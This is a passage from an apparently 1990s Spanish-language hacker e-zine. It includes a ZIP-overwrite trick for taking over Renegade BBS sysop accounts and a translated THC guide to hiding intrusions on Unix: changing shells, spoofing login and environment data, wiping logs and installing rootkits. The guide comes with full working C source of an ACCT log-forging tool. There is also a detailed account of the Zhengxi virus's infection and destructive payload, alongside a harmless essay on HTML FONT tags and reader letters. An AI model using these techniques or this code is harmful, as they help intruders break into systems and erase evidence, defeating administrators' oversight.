 los archivos usando el flag -od que es default en Renegade.

 Si creas el USERS.DAT usando una copia tuya de renegade puedes ser el sysop
 y poner el password que te guste mas :-). Muchas BBS's tienen esta
 vulnerabilidad pero el truco consiste en seguir las siguientes reglas:
 - Puedes moverte por los directorios unicamente si el nombre del archivo
   es de maximo 12 digitos (8 mas "." y la extension).
 - El archivo ZIP se corrompe cuando tratas de crear muchos directorios.

 La efectividad depende en que tan bien conoscas los directorios de una
 BBS pero puedes lograr sobre-escribir archivos en cualquier directorio
 sin tener que ser el USERS.DAT

 Si remueven el flag -o, el sistema aun es vulnerable si editando tu zip
 haces dos archivos con el mismo nombre. Esto "cuelga" el sistema cuando trata
 de sobre-escribir al otro archivo. El unico remedio es remover el flag -d
 a la hora de descomprimir los archivos y dejar el -o.

                            =--=--=--=00=--=--=--=

  [ Esta tecnica de modificar los ZIPs es ilimitable en sus posibilidades ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
                        
                         Como cubrir tus Huellas 
                                       
                        
                          SEGUNDA PARTE: PRACTICA

   I. EL PRIMER COMANDO

   El primer comando que debes ejecutar despues de entrar a un sistema con
   una cuenta hackeada es cambiar de shell. El proposito es el evitar que
   los comandos que ejecutes terminen en el archivo .history
   Una revision de este archivo por el usuario real o el administrador
   revelaria tu presencia y lo que hiciste!
   Si estas ejecutando el shell CSH, entonces cambia a shell SH y vice versa.

$   <- Prompt SH
%   <-  prompt CSH

   Si no usan en el sistema los prompts standards, ejecuta SH. Si el prompt
   permanece igual escribe "exit" y ejecuta CSH ...

   II. ULTIMO TRABAJO CON LOS LOGS

   Si cuando entras a un sistema con una cuenta hackeada y aparece en tu
   pantalla un mensaje como "Last successful login from alpha.master.mil"
   significa que el usuario de esa cuenta es notificado desde donde entraron
   por ultima vez usando su cuenta. Para evadir este problema sin hackear
   root o no quieres borrar/editar archivos entonces ejecuta "rlogin <host>"
   y usa la misma cuenta para entrar al sistema de nuevo. despues escribe
   exit para regresar de nuevo a la primer entrada.
   Esto cambiara el texto avisando al usuario la proxima vez que entre
   un log asi <current host> o "localhost".

   III. EVASION DE WHO

   Despues de completar los pasos 1 y 2 escribe "w"...veras todos los
   usuarios actualmente en linea y tambien la direccion desde donde entraron.
   Si tu estas en Mexico y entras a un sistema americano, esto se vera muy
   sospechoso para los que usen "w".
   Para sobrepasar este error sin necesidad de ser root necesitas tan solo
   ejecutar "login" con el mismo username y password. Si ese sistema tiene
   el bug de las versiones recientes de unix, tu direccion origen sera
   modificada a "tty05".

   V. EJECUTAR PROGRAMAS

   No ejecutes programas con nombres sospechosos ... ISS y YPX son por
   ejemplo muy sospechosos y un administrador con un poco de cerebro
   notara algo raro cuando vea a un usuario ejecutando "loadmodule hack"
   en su Sun.
   Deberas copiar y renombrar los comandos para que nadie sospeche.
   La lista de procesos puede ser checada con "ps -ef" o "ps -auxwww" y
   los programas que consuman mas proceso del CPU apareceran con "top" ...
   asi que es muy facil monitorear los programas que los usuarios esten
   ejecutando.

   VI. TELNET

   Solo hay dos cosas que deben decirse sobre usar telnet con propositos de
   hackear. Primero NUNCA escribas "telnet objetivo.com.mx". Escribe "telnet"
   y despues "open objetivo.com.mx" que no mostrara como parametro en la lista
   de procesos a que sitio estas haciendo telnet. Segundo, algunos clientes
   telnet exportan variables de ambiente del sistema. Si tu hack es detectado
   y ellos pueden tracearte hasta el host origen ellos tambien tendran el
   nombre de la cuenta que usaste en el host origen. Asi que debes definir
   a cualquier cosa que quieras las siguientes variables antes de empezar
   telnet, rlogin o similares: USER, LOGNAME, UID, HOME, MAIL
   Para cambiar esas variables:

      SH : <variable>=<nuevo valor>;export <variable>
           ejemplo : USER=nadie;export USER

     CSH : setenv <variable> <nuevo valor>
           ejemplo : setenv USER nadie

   VII. REMUEVE TUS ARCHIVOS

   Cuanto intentes exploits -con exito o sin el- borralos inmediatamente
   despues de usarlos - especialmente si los usas en /tmp !
   Si realmente necesitas trabajar en el directorio temporal (/incoming /temp)
   entonces crea un directorio como ".X11", y dale atributo 711.


  -->   !  Los siguientes 2 puntos solo son posibles con acceso root !  <--

   VI. MODIFICAR LOS LOGS

   Los logs mas importantes son LASTLOG, WTMP y UTMP

   Si tuviste exito en volverte root debes modificarlas.
   Pueden ser usualmente encontrados en /etc, /var/adm o /var/log pero
   pueden estar en cualquier otra parte.

   Que herramientas debo usar? ZAP (o ZAP2) es bueno, pero no te BORRA de los
   logs sino sobre-escribe las entradas con ceros.
   Antes de compilar ZAP debes revisar los paths definidos para los logs!
   Debes usar CLOAK2 que cambia los datos importantes en los logs pero no es
   posible compilarlo en todos los sistemas.
   Tambien puedes intentar CLEAR que REALMENTE elimina las entradas.

   VII. SYSLOG & LASTCOMM

   Debes checar el archivo de mensajes del logfile donde tal vez las entradas
   con tu cuenta hackeada se encuentren ahi. Usualmente se encuentra en
   /var/adm o /var/log ... la mayor parte del tiempo se llama "messages" pero
   puede tener otros nombres.
   Revisa el archivo /etc/syslog.conf para saber el path y el nombre del
   archivo con los logs.
   
   Para remover tu nombre de host del archivo "messages" ejecuta:
   "grep -v tu.host.com messages > /tmp/tmpfile; mv /tmp/tmpfile messages"

   LASTCOMM es una herramienta para guardar todos los comandos ejecutados,
   es una MALIGNA herramienta contra hackers pero la mayoria de las veces
   no se encuentra instalada. Ahora no tienes nada que temer, obten el
   programa ACCT de Zhart's y siente la libertad.

   VIII. INSTALANDO TROYAS
   
   Cuando instales un sniffer, recuerda que cualquiera puede ejecutar
   "ifconfig -a" para revisar si la tarjeta esta en modo promiscuo. Obten un
   rootkit para tu sistema UNIX y reemplazalo.

   X. FIN

   Nunca seas flojo y recuerda revisar al 100% tus acciones - o afrenta las
   consecuencias!!

-------------------------------- ACCT CLEANER --------------------------------


Usage: <progname> -u user -f user [-t time]/[-b] [-p command] [-h]
-u user_login     (necessary) User to hide
-f user_login     (necessary) User to fake
-t hh:mm dd/mm/yy (if not -b) Start editing from this date
-b                (if not -t) Start editing from file's beginning
-p command_name    (optional) Fake user only about this command
-m                 (optional) CountDown Mask mode
-h                            This help and exit
If NO arguments are given program acts in interactive mode

 [- Configuration -]

You must "#undef LINUX" or comment the "#define LINUX" line if you're 
compiling the program on a non-linux board.
Then you should verify that the acct file is in "/var/adm/acct", otherwise 
you have to change the string "filename" in the "main" procedure.

You can set the default user id's of the user you want to hide and of the user
you want to show, stored in the variables "u_uid" & "f_uid"; this will work
if "-f" and/or "-u" options are omitted while "-b" or "-t" are used.

You can set the number of steps the program uses in the fast-search phase by
defining the pre-processor variable STEPS:
#define STEPS 500
Choose it by experimenting and comparing the dates reported by the program 
(fast-search/slow-search) with the time taken to reach standard targets 
(it depends on ACCT_file's size). 
[ Beware that giving a starting time (when running the program) which is 
relatively close (it depends on STEPS) to file's beginning time could 
generate problems (tipically make the program exit without doing anything).
So, in this case, it's better (and more logical) to use the "beginning" 
option. ]

   #### By Zhart/THC  (c) 1996 #### */
--------------------------------- Comienza Codigo-----------------------------
#define LINUX

#include <stdio.h> 
#include <sys/types.h> 
#include <sys/file.h> 
#include <unistd.h> 
#ifdef LINUX
#include <linux/acct.h>
#else 
#include <sys/acct.h>
#endif
#include <time.h>
#include <pwd.h>
#include <strings.h> 
#include <signal.h>
#include <fcntl.h>

#define SHOW    /* Comment this line if don't want explicit evil messages */
                  /* compiled with the program (to protect from "strings") */

#define PWD 0   /* Set it to 1 to ask for a password in interactive mode */
                               /* and not showing help from command line */

#define STEPS  500   /* Number of steps to go back in fast search */
#define COUNTD 20    /* CountDown seconds (for mask mode) */

int u_uid=0;         /* Default uid of user to hide */
int f_uid=3;         /* Default uid of user to show */
char p_name[16];     /* Program to assign to fake_user */ 
int b_flag=0;           /* Beginning (no date) flag */
int m_flag=0;           /* CountDown Mask Mode flag */
char filename[30];      /* acct logging file */


int vWd ()
/* validatePwd - verifies program password */
{
char word[10];
char token[10];
word[0] = 'z';
word[1] = 'h';
word[2] = 'a';
word[3] = 'r';
word[4] = 't';
word[5] = '\0';

scanf ("%s",token);
if (strcmp(token,word)) return(0);
else return(1);
}


void usage()
{
#ifdef SHOW
if (!PWD) {
  printf("\nUsage: <progname> -u user -f user [-t time]/[-b] [-p command] [-m] [-h]\n"); 
  printf("-u user_login     (necessary) User to hide\n");
  printf("-f user_login     (necessary) User to fake\n");
  printf("-t hh:mm dd/mm/yy (if not -b) Start editing from this date\n");
  printf("-b                (if not -t) Start editing from file's beginning\n");
  printf("-p command_name    (optional) Fake user only about this command\n");
  printf("-m                 (optional) CountDown Mask mode\n");
  printf("-h                            This help\n");
  printf("If NO arguments are given program acts in interactive mode\n\n");
  }
#endif
}

int vUsr(char *name)
/* verifyUser - returns the uid of a user's login name */
{
struct passwd *pwt;

if((pwt = getpwnam(name)) != NULL)
  return(pwt->pw_uid);
else {
#ifdef SHOW  
printf ("Error: %s is not a valid user\n",name);
#endif
  exit(1);
  }
}

int readParams(char *args[],int ac,long *i)
{
struct tm t;
int x;

if (ac==1) return(0);
else for(x = 1; x < ac; x++) {
  if(args[x][0] == '-')
    switch(args[x][1]) {
      case 'u':                         /* username to hide */
                if((x + 1) < ac)
                   u_uid=vUsr(args[++x]);
                break;
                
      case 'f':                        /* fake user to be shown */
                if((x + 1) < ac)
                   f_uid=vUsr(args[++x]);        
                break;

      case 't':                        /* date since start scanning */ 
                if((x + 2) < ac)
		   sscanf(args[++x],"%d:%d",&(t.tm_hour),&(t.tm_min));
                   sscanf(args[++x],"%d/%d/%d",&(t.tm_mday),&(t.tm_mon),&(t.tm_year));
                   t.tm_sec=0;
                   (t.tm_mon)--;
                   t.tm_wday=0;
                   t.tm_yday=0;
                   t.tm_isdst=0;
                   *i=mktime(&t);
#ifdef SHOW                   
                   printf ("\nInput time has been interpreted as: %.24s\n",ctime(i));
#endif
                break;

      case 'b': 
                b_flag=1;
                break;
      
      case 'p':
                if((x+1) < ac)      
                  strcpy(p_name,args[++x]);
                break;
      
      case 'h':  
                usage();
                exit(1);

      case 'm':
                m_flag=1;
                break;
      }
  }
return(1);
}

void readDate (long *i)
/* Reads date and returns it in UTC (seconds) */
/* Interactive mode */
{
struct tm t;
printf("Please type time,day,month,year  Ex: 13:15 27/10/83\n --> "); 
scanf("%d:%d %d/%d/%d",
&(t.tm_hour),&(t.tm_min),
&(t.tm_mday),&(t.tm_mon),&(t.tm_year));
t.tm_sec=0;
(t.tm_mon)--;
t.tm_wday=6;
t.tm_yday=0;
t.tm_isdst=0;

*i=mktime(&t); 
printf ("Input time has been interpreted as: %.24s\n",ctime(i));
}

void rUsrs()
/* readUsers - Interactive mode */
{
char u_name[16];
char f_name[16];
#ifdef SHOW
printf("\nName of user to hide:");
#endif
printf("\n --> ");
scanf("%s",u_name);
u_uid=vUsr(u_name);
#ifdef SHOW
printf("\nName of user to show:");
#endif
printf("\n --> ");
scanf("%s",f_name);
f_uid=vUsr(f_name);
}

void Interactive(long *u_date)
{
char answer[16];
if (PWD) if (!vWd()) exit(1);
startEnd();
if (PWD) getchar();
printf ("Start from beginning? [y/N]: ");
if (getchar()=='y') b_flag=1;
  else readDate(u_date);
rUsrs();
/* readProg */
getchar();
printf ("\nSpecify command? [y/N]: ");
if (getchar()=='y') {
  printf(" ==> ");
  scanf("%s",answer);
  strcpy(p_name,answer);
  }
}


int startEnd()
/* Prints dates of first and last log */
{
struct acct actbuf;
int fd;
long endtime;

#ifdef SHOW
printf ("\n########   ACCT Handler by Zhart (c) 1996   ########\n");
#endif
/* Open acct file in read-only mode*/
if((fd = open(filename,O_RDONLY)) == -1 )
  return(-1);

/* read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }

endtime=actbuf.ac_btime+actbuf.ac_etime;
printf("\nFile starts at:  %.24s\n",ctime(&endtime));

/* GotoENd */
if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) {
      (void)close(fd);
      return(0);
      }

/* Read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }

endtime=actbuf.ac_btime+actbuf.ac_etime;
printf("File ends at:    %.24s\n\n",ctime(&endtime));
(void)close(fd);
}


int reachFast (int fd,long u_date)
{
struct acct actbuf;
int found=0;
long endtime;

/* Set offset to end of file */
if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) {
      (void)close(fd);
      return(0);
      }

while (!found) {

  /* Read the buffer */
  if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }
  /* Verify date */
  endtime=actbuf.ac_btime+actbuf.ac_etime;
  if (endtime < u_date) found=1;
  else 
    /* Go down of STEPS lines <------ */
    if(lseek(fd,(long)(-(STEPS*sizeof(actbuf))),SEEK_CUR) < 0) {
      (void)close(fd);
      return(0);
      }
  }
printf ("Date reached (fast): %.24s\n",ctime(&endtime));
}

int reachSlow (int fd,long u_date)
{
struct acct actbuf;
int found=0;
long endtime;

while (!found) {

  /* Read the buffer */
  if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
    (void)close(fd);
    return(0);
    }
  /* Verify date */
  endtime=actbuf.ac_btime+actbuf.ac_etime;
  if (u_date<=endtime) found=1;
  }
printf ("Date reached (slow): %.24s\n",ctime(&endtime));
}


int verifyA (struct acct actbuf)
/* verifyAct - Verifies if acct record must be edited */
{
/* return(actbuf.ac_uid==u_uid); */
if (actbuf.ac_uid==u_uid) 
  if (p_name[0]=='\0') return(1);
  else if (!strcmp(p_name,actbuf.ac_comm)) return (1);
return(0);
} 


int editA(int fd,struct acct actbuf)
/* editAct - */
{
printf("#");
fflush(stdout);
actbuf.ac_uid = f_uid;
actbuf.ac_flag &= ~ASU;
if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
  (void)close(fd);
  return(0);
  }
if(write(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
  (void)close(fd);
  return(0);
  }
}


int scanA (int fd)
/* scanACCT - */
{
struct acct actbuf;
#ifdef SHOW
printf ("Scanning data ...\n");
#endif
while (1) { 
  /* read buffer*/
  if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
      (void)close(fd);
      return(0);
      }
  /* verify criteria matching and (eventually) start editing */
  if (verifyA(actbuf)) editA(fd,actbuf);
  } 
}



main(int argc,char *argv[])
{
long u_date;
int fd;

filename[0]='/';
filename[1]='v';
filename[2]='a';
filename[3]='r';
filename[4]='/';
filename[5]='a';
filename[6]='d';
filename[7]='m';
filename[8]='/';
filename[9]='a';
filename[10]='c';
filename[11]='c';
filename[12]='t';
filename[13]='\0';

if (!readParams(argv,argc,&u_date)) Interactive(&u_date);
else startEnd();
if (m_flag) {
  setuid(0);
  sleep(COUNTD);
  }

/* Should insert a date validation */

#ifdef SHOW
printf ("\nHiding user id: %d Showing user id: %d\n",u_uid,f_uid);
#endif

/* Open ACCT file in read/write mode */ 
if((fd = open(filename,O_RDWR)) == -1 )
  return(-1);
if (!b_flag) { 
  reachFast(fd,u_date);
  reachSlow(fd,u_date);
  }
scanA(fd);
(void)close(fd);
printf("\n");
}

-----------------------------------FIN DEL CODIGO-----------------------------

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  Texto original por Van Hauser de THC traducido y revisado por CrackSmoker
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                         Que hay de malo con <FONT> ?

  Cuando Netscape introdujo su elemento <FONT>, con sus atributos SIZE= y
  COLOR=, muchos autores de paginas web dieron la bienvenida a la promesa
  de tener control sobre la presentacion de sus documentos; los mismos
  autores sintieron alivio cuando Microsoft introdujo un atributo adicional
  <FONT FACE=*>. Muchos de estos autores no se dieron cuenta que sus
  documentos se volverian invisibles, dificiles de leer o inaccesibles a
  muchas personas. Exactamente eso fue lo que paso debido a la implementacion
  de estos elementos unicamente a los navegadores populares.

  Las extensiones en HTML se dice que "degradan graciosamente" si no
  interfieren con la legibilidad en los navegadores que no soporten esas
  extenciones. Para los navegadores como Lynx, y otros que no soportan
  tamaos de fonts, colores o estilos, los efectos del elemento <FONT> son
  relativamente benignos. Si el autor trata de enfatizar un texto especifico
  por su tamao o color, el usuario del navegador de modo texto (como Lynx)
  podra ver el texto pero no el enfasis.

  Los verdaderamente efectos del elemento <FONT> son reservados para los
  usuarios de los navegadores graficos mas populares como Netscape e Internet
  Explorer.

  Un usuario de netscape que tiene una laptop con una display relativamente
  pequeo tiene los small fonts configurados para poder ver una decente
  cantidad de material en su pantalla. El autor de un sitio web ha diseado
  una tabla con <FONT SIZE=1>; este texto se mostrara tan pequeo que sera
  ilegible.

  Otro usuario con problemas de vista tiene su laptop configurada con extra
  large fonts, y el "diseador web" decide hacer un comentario con <FONT
  SIZE=4>; ahora una pequea frase ocupa la mayoria de la ventana, y el
  usuario permanece frustrado. Un tercer usuario tiene una sofisticada
  estacion de trabajo con un monitor extra grande (17"), pero, como el 10%
  de los usuarios masculinos, el tiene ceguera con los colores y necesita
  un fuerte contraste entre el texto ordinario y el background. El ha
  configurado su navegador para que use un texto negro con fondo amarillo, y
  ha especificado que esta configuracion permanezca a pesar de la pagina que
  visite. Pero llega a una "kewl" web page con texto blanco y un fondo
  negro. El usuario esta viendo negro en amarillo. Pero esta pagina tiene
  una sentencia por aqui y por alla con <FONT COLOR="yellow">--esto puede
  verse bien en el fondo negro que especifico el autor, pero es completamente
  invisible en el fondo amarillo del usuario. El quizas se pregunte que
  seran todos esos espacios vacios, pero a menos que vea el codigo fuente,
  el nunca sabra que se pierde una parte importante del mensaje. Mientras
  Netscape permite abolir los colores del cuerpo y texto de cualquier pagina,
  no permite abolir los colores de los fonts.

  El elemento FONT obstruye la presentacion de la informacion por hacer 
  demasiadas asumciones sobre el sistema del usuario, navegador y
  configuracion. Si tienes algo que decir, informacion que dar a conocer,
  o sentimientos que expresar, entonces es tu interes hacer tu pagina
  accesible a todos. Inteligentes creadores de paginas, que desean hacer
  llegar su mensaje a todos, se mantienen lejos del elemento <FONT>.

  La solucion?? Hoy en dia muchas paginas permiten configurar la forma
  en que deseas verlas en forma de opciones de cascada. Asi, cualquier
  persona configura la pagina (no el navegador) para no perder informacion
  que tal vez, pueda ser valiosa.

  raretrip

  [ Nota: estamos estudiando la posibilidad de remover el elemento FONT de
    nuestra pagina pero aun no nos hemos decidido. sirve bastante bien para
    mejorar la presentacion de una pagina ;-) ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                          
                          El padre de todos los virus
                          

                                 Segunda Parte

 ...
 Antes de desinfectarlo, el virus comprueba si el fichero abierto esta
 infectado usando el primer metodo (division por 9dh y resto igual 25h);
 posteriormente comprueba si el fichero es local o remoto (no accede a los
 discos remotos), y mira los punteros CS,SS y SP de la cabecera EXE. Tras
 haber hecho esto, finalmente compara el nombre del programa que abrio el
 fichero usando los CRCs con la lista de los 16 'programas fatidicos', y no
 lo desinfecta en caso de coincidencia.
 Al leer un fichero (ah=3fh) el virus llama a la rutina stealth. En caso
 de leer algunos de los bytes de la cabecera de un fichero infectado, el
 virus lee, desencripta y copia la cabecera original en el bufer de lectura,
 de forma que no se apreciaran los cambios en el fichero.
 Las llamadas a FindFirst/FindNext tambien son usadas por el virus para
 infectar. El Zhengxi guarda el nombre de uno de los ficheros encontrados
 por FindFirst, y el del quinto fichero, aproximadamente (probabilidad 3/16)
 encontrado por la funcion FindNext. El virus solo tiene un bufer para
 almacenar nombres de ficheros por lo que el siguiente nombre sobreescribe
 al anterior.
 Finalmente, al cerrar un fichero (ah=3eh), el virus busca e infecta el
 fichero cuyo nombre conserva en su bufer. Ademas, tambien infecta el
 fichero que se esta cerrando, solo que con una probabilidad 1/4 (el resultado
 sale de un randomizer propio).

 Infeccion

 Antes de infectar, el Zhengxi comprueba algunas condiciones:
  -El fichero no acaba de ser creado, es decir, no es un fichero reciente.
  -El fichero es local y no esta ni en A: o B:
  -El fichero no es *.?v?
  -Hay suficiente espacio en disco (lo comprueba con ah=26h, int 21h)
 En caso de cumplirse estas tres condiciones, el virus lee la cabecera y mira
 si es valida usando CRC's.
 Tambien hay que destacar que el virus no solo comprueba la cabecera sino que
 tambien comprueba otros campos y puntos del fichero para evitar la
 destruccion de ficheros de datos.

 Infeccion de EXE's

 Lo mas interesante del virus es cuando infecta ficheros EXE. Puede hacerlo
 de tres formas: anexandose al final (appending), insertandose (inserting)
 o infectando EXEs autoexpandibles (self-extracting).
 Primero el Zhengxi mira la estructura del fichero; en caso de ser un fichero
 autoexpandible (creado con zip2exe por ejemplo), el virus infecta el fichero
 adjunto (ZIP, ARJ, RAR) usando el metodo descrito mas abajo; crea un dropper
 COM y se anexa al fichero.
 Despues mira la longitud. Hay que destacar que no infecta ficheros menores
 a 400h (1204 bytes). Ademas chequea otros campos en la cabecera EXE, como
 el numero de items de recolocacion, marcas de empaquetadores (PkLite: este
 virus puede infectar ficheros comprimidos con pklite), y los campos de
 longitud. Si la longitud del modulo (NO la longitud del fichero) es mayor que
 32k, el virus inserta su cargador en medio del fichero. Si no, el virus
 infecta el fichero usando el metodo appending.
 Al infectar archivos por este metodo, el virus lee la cabecera, la encripta
 y la guarda al final del fichero. Entonces ejecuta su generador polimorfico
 y guarda el cuerpo del virus encriptado y los loops polimorficos al final
 del fichero.
 Para acabar la infeccion, el virus incrementa la longitud del fichero hasta
 un valor que, dividido por 9dh, de de resto 25h (su marca de infeccion), y
 modifica los punteros de la cabecera EXE.
 Usando el mismo metodo CRC, el virus busca este codigo en el fichero, si no
 lo encuentra, el virus pasa el control directamente a la infeccion de tipo
 appending. En caso de exito, el virus busca en los siguientes 54h (80) bytes
 de codigo un ret o un far call (c3h, cbh, cfh, 9ah, cah, c2h) para no
 pasarse a la siguiente subrutina o direccion relocalizada. Si se encuentra
 ese codigo, el virus abandona la rutina de infeccion.
 Si no, el virus sobreescribe esos 54h bytes con el codigo del cargador del
 virus, encripta el codigo principal con su engine polimorfica y se copia
 al final del fichero. Despues de esto, al igual que hacia con el otro tipo
 de infeccion (appending), escribe un numero indeterminado de bytes aleatorios
 para usarlos como marca de infeccion.
 Al ejecutar el cargador del virus, este busca el nombre del host en los
 campos correspondientes del PSP (Program Segment Prefix), abre el fichero
 para luego mover el puntero al final, y alli leer, desencriptar y ejecutar
 la segunda parte del dropper. Esta parte restaura la subrutina parcheada,
 ubica la memoria del sistema (convencional o UMB), lee el cuerpo del virus
 y le da el control al loop de desencriptado polimorfico. Con el loop
 desencripta el cuerpo del virus y le pasa el control a la rutina de
 instalacion; el virus se instala en la memoria del sistema y le devuelve la
 ejecucion al fichero host.

 Este es un tipo de infeccion muy insidioso. El codigo virico esta escondido
 en el fichero, y no hay una entrada directa hacia el mismo desde la cabecera
 del fichero. El virus se inserta a si mismo en el lugar de una de las
 subrutinas del host. Incluso puede tratarse de una subrutina rara vez
 ejecutada. Por ejemplo, una subrutina que muestre un mensaje de error en la
 pantalla. De esta forma, el virus esta en estado 'latente' durante un largo
 periodo de tiempo, hasta que un buen dia 'sale al exterior' e infecta
 el sistema bajo determinadas condiciones.

 Infeccion de ficheros comprimidos

 En este tipo de infeccion, el virus crea en memoria la imagen de un archivo
 COM infectado, un dropper y lo introduce en el fichero comprimido. Este
 dropper siempre empieza con un jmp seguido de datos aleatorios, el virus
 encriptado, y el loop de desencriptado polimorfico. Esta introduccion (jmp)
 salta directamente al inicio del loop.
 El nombre del dropper tambien es aleatorio y lleva extension COM; he aqui
 algunos ejemplos de los nombres que puede llegar a tener:
 HAIF.COM, UCM.COM, DOO.COM, VLG.COM, etc.
 Para procesar los ficheros comprimidos y todos sus campos, el virus no se
 ayuda de ninguna utilidad externa. sino que usa sus propias rutinas de
 descompresion de ARJ, ZIP y RAR. Sin embargo, el virus no comprime el codigo
 del dropper; simplemente lo guarda en modo 'stored'.
 El virus no introduce su dropper en los ficheros comprimidos con PKzip en
 caso de que dentro de estos haya algun otro fichero ya comprimido con el
 metodo stored. Esto esta pensado para no introducir el dropper en mas de una
 ocasion dentro de los ficheros comprimidos.

 Payload

 El Zhengxi solo tiene un payload o rutina de activacion, excepto la que usa
 para retornar al DOS desde un COM. Esta rutina puede ser ejecutada mientras
 se estan procesando los archivos zips. Si el virus encuentra algun registro
 empaquetado con el modo 'stored', chequea la fecha, la hora y el 'sello' o
 marca del ZIP. Si el ao de la ultima modificacion es igual o superior a
 1996, el virus busca todos los ficheros de todos los directorios, desde la
 C: hasta la Z:, y los borra, incluyendo el arbol de subdirectorios (FAT).

 FINAL
 ~~~~~
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

ɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻ
ȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼ
                               
                                      
                                   
                    
            "Tu linea de comunicacion segura con el Underground"            
                                                                            
ɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻ
ȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼ
                              MailBoy: KillerBot

 De nuevo un saludo a toda la p30pl3 y quisiera decirles la razon por la que
 esta seccion ya no se llama "CTRL - ALT - DEL". Resulta que cuando decidimos
 hacer esta seccion uno de nosotros sugirio ese nombre PERO no nos dijo que
 ya existia otra revista con una seccion igual!! A pesar de que esa
 publicacion quizas ni se haya enterado de que usamos el nombre de su seccion
 para los mismos fines en esta revista, decidimos cambiar el nombre de ahora
 en adelante a esta seccion. Saludos a los editores de esa revista -a los que
 aun no conocemos- y disculpen por el error.

 <<::RareGaZz::>>

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 Mencionamos en un numero anterior que podian usar a televisa.com como un
 servidor email que no imprimia la direccion IP pero este servidor ya no
 realiza este favor a la comunidad cybernetica asi que no cuenten con que
 su direccion IP no sera impresa en sus mensajes.

 Mr.x

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-


 Saludos a estas ciudades:

 Laredo Texas,
 Lima Peru,
 Monterrey Mexico,
 Viladecans Espaa,
 Guatemala,
 Piura Peru,
 Montevideo

 Y a estas personas:

 PECAR
 Truco
 Orion
 Cnest
 Xdawn
 DuvaHazard
 Monra

 Por sus colaboraciones y/o apoyo para este numero.

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

  por que copiaron el logo de CDC en su numero anterior para ponerle fin a
  su revista asi como ellos lo usan como footer para sus textos?

[ Tienes razon, copiamos el logo de la vaca para nuestra revista. Tenemos que
  admitir que es un DAMN GOOD LOGO! como muchos no saben quienes son o que
  hacen los de CDC basta decir que escriben textos con temas abstractos. Al
  parecer sus iniciales significan:
  cult of the dead cat / cult of the disposable camera / cult of the drying
  cumstain / cult of the dead canary / cult of the dead chihuaha / cult of
  the dead cadillac / concentrated drag cweenz / cult of the douche condom /
  cult of the dope cut / cult of the dressed cabbage / cult of the dumb
  comedian / cult of the deadly carbonated_beverage / cult of the dead
  canine / cult of the dumb cow / cult of the disheiferist clep / cult of the
  duplicated copy / clean dildos in a cab / cows drowning cows / cult of the
  dumb cult / cult of the dildo that can / crowning dead corpses / cult of
  the disposable condom / cyber doodical c / can dogs croak? / cult of the
  dead cornflake / cult of the distinct color / cult of the dead crib / y
  a lo mejor, CULT OF THE DEAD COW ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

Que tal, yo de nuevo felicitandolos por su reva, quisiera decirles
que no existe el BBS Serpool en Puebla, existio! ahora son
provedores de i-net, el numero es 375170, no el 402334 como lo
decia en su reva en el articulo de Truco...

xDAWN

 [ Ok nota tomada en cuenta. Thanx. ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 Le PompeItor, LePompeItor o Le PompaItor ???

 [ Oficialmente es: "LePompeItor" PERO cuando iniciamos el habia elegido ser
   conocido como "Le pompaItor". El error fue que el editor del segundo numero
